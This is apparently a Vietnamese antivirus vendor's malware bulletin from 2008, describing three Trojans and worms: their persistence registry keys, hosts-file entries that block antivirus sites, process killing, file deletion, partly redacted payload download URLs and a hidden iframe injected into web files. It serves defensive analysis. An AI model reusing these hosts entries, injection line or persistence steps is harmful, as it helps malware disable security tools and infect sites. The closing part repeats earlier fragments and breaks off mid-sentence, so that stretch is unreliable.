Tên malware: W32.QhostA.Trojan Thuộc họ: W32.Qhost.Trojan Loại: Trojan Xuất xứ: Nước ngoài Ngày phát hiện mẫu: 17/04/2008 Kích thước: 83 Kb Mức độ phá hoại: Trung bình Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Hiện tượng: Không cho người sử dụng truy cập vào các trang web: mcafee.com, kaspersky.com, avast.com Cách thức lây nhiễm: Phát tán qua các trang web. Cách phòng tránh: Không nên truy cập vào các trang web độc hại, phần mềm miễn phí. Mô tả kỹ thuật: Copy bản thân vào file "%SysDir%\iexplore.exe" và tạo key run để khởi động mỗi khi bật máy [HKLM\ \Windows\CurrentVersion\Run] "Microsoft Internet Explorer" = "%SysDir%\iexplore.exe" Dump ra các file o %SysDir%\%random_name%.exe được phát hiện là QhostADmp. Sửa file host để ngăn không cho người dùng truy nhập vào các trang: 127.0.0.1 www.symantec.com 127.0.0.1 securityresponse.symantec.com 127.0.0.1 downloads1.kaspersky-labs.com 127.0.0.1 downloads2.kaspersky-labs.com 127.0.0.1 downloads3.kaspersky-labs.com 127.0.0.1 downloads4.kaspersky-labs.com 127.0.0.1 downloads5.kaspersky-labs.com 127.0.0.1 www.kaspersky-labs.com 127.0.0.1 symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 sophos.com 127.0.0.1 www.mcafee.com 127.0.0.1 mcafee.com 127.0.0.1 liveupdate.symantecliveupdate.com 127.0.0.1 www.viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 f-secure.com 127.0.0.1 www.f-secure.com 127.0.0.1 kaspersky.com 127.0.0.1 www.avp.com 127.0.0.1 www.kaspersky-labs.com 127.0.0.1 avp.com 127.0.0.1 www.networkassociates.com 127.0.0.1 networkassociates.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com 127.0.0.1 mast.mcafee.com 127.0.0.1 my-etrust.com 127.0.0.1 www.my-etrust.com 127.0.0.1 download.mcafee.com 127.0.0.1 dispatch.mcafee.com 127.0.0.1 secure.nai.com 127.0.0.1 nai.com 127.0.0.1 www.nai.com 127.0.0.1 update.symantec.com 127.0.0.1 updates.symantec.com 127.0.0.1 us.mcafee.com 127.0.0.1 liveupdate.symantec.com 127.0.0.1 customer.symantec.com 127.0.0.1 rads.mcafee.com 127.0.0.1 trendmicro.com 127.0.0.1 www.trendmicro.com 127.0.0.1 vncsvr.com 127.0.0.1 secdreg.org 127.0.0.1 virusscan.jotti.org 127.0.0.1 virustotal.com 127.0.0.1 dnl-eu12.kaspersky-labs.com 127.0.0.1 dnl-eu13.kaspersky-labs.com 127.0.0.1 dnl-cd1.kaspersky-labs.com 127.0.0.1 dnl-ru1.kaspersky-labs.com 127.0.0.1 dnl-ru2.kaspersky-labs.com 127.0.0.1 dnl-ru5.kaspersky-labs.com 127.0.0.1 dnl-cn1.kaspersky-labs.com 127.0.0.1 liveupdatesnet.com o %SysDir%\%random_name%.exe được phát hiện là AgentProx, ghi key run: [HKLM\ \Windows\CurrentVersion\Run] với giá trị "Advanced DHTML Enable" = %SysDir%\%random_name%.exe Chuyên viên phân tích : Tô Đình Hiệp 11. Bkav1672 (23/05/2008) cập nhật lần thứ 1: VetorDH, WycaliB Malware cập nhật mới nhất: Tên malware: W32.Wycali.Worm Thuộc họ: W32.Wycali.Worm Loại: Worm Xuất xứ: Trung Quốc Ngày phát hiện mẫu: 22/05/2008 Kích thước: 9Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Mất các file .GHO Làm hỏng một số file chương trình. Hiện tượng: Sửa registry. Không sử dụng được một vài chương trình antivirus. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Lây qua các file thực thi. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Tắt các process : avp.exe, kvsrvxp.exe, kissvc.exe Kiểm tra nếu có process : avp.exe thì đặt lại năm hệ thống thành 2004. Xóa tất cả các file .GHO Tìm và lây nhiễm tất cả các file exe ngoại trừ : qq.exe, QQDoctor.exe, QQDoctorMain.exe. Đổi tên session cuối thành ".WYCao" nên một số chương trình ứng dụng sẽ không chạy được. Download file config từ link : http://x.u[removed]-01.net/x.txt Đọc file config, nếu sau từ khóa InfeWeb: có đường link thì ghi link đó vào cuối tất cả các file có đuôi : .do, .htm, .html, .shtm, .shtml, .asp, .aspx, .php, .jsp, .cgi, .xml Download trojan OnlineGames từ các link : http://1.fo[removed]00.net/a1.exe http://1.fo[removed]d00.net/a36.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.AmvoDH.Worm, W32.Bilano.Trojan, W32.CyberAle.Adware, W32.DownloadAB.Trojan, W32.KavoXLF.Worm, W32.OnGamesXAA.Trojan, W32.Piery.Trojan, W32.FloodBlack.Trojan, W32.RejoicerC.Worm, W32.SpybotV.Trojan, W32.FakeAlertXA.Trojan, W32.CeekatK.Rootkit, W32.ProxyA.Trojan, W32.VetorDH.PE 12. Bkav1680 - Phát hành lần thứ 2 ngày 28/05/2008, cập nhật QuikMsg, AvpB, CinmusXF, KavoADS, NTRootB, PeserD, PeserE Malware cập nhật mới nhất: Tên malware: W32.PeserD.Worm Thuộc họ: W32.Peser.Worm Loại: Worm Xuất xứ: Nước ngoài Ngày phát hiện mẫu: 28/05/2008 Kích thước: 61Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Làm hỏng các file thực thi đã được pack. Hiện tượng: Sửa registry. Không chạy được một vài chương trình thực thi. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy. Copy bản thân thành file có tên "mscrss.exe" vào thư mục %SysDir% Copy bản thân kèm theo file Autorun.inf vào các ổ USB để lây nhiễm. Download file từ link : http://ieopen.yhg[removed]es.com/iedown/down/upbho.exe Chèn thêm vào các file : .cgi, .php, .jsp, .asp, .html, .htm dòng sau : <iframe src="http://pk.yhg[removed]es.com/index.htm" width="0" height="0"></iframe> Tìm và lây nhiễm code độc vào các file *.exe (ngoại trừ thư mục Windows và ProgramFiles), đồng thời ghi bản thân . mcafee.com 127.0.0.1 liveupdate.symantecliveupdate.com 127.0.0.1 www.viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 f-secure.com 127.0.0.1 www.f-secure.com. www.trendmicro.com 127.0.0.1 vncsvr.com 127.0.0.1 secdreg.org 127.0.0.1 virusscan.jotti.org 127.0.0.1 virustotal.com 127.0.0.1 dnl-eu12.kaspersky-labs.com 127.0.0.1 dnl-eu13.kaspersky-labs.com. Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy. Copy bản thân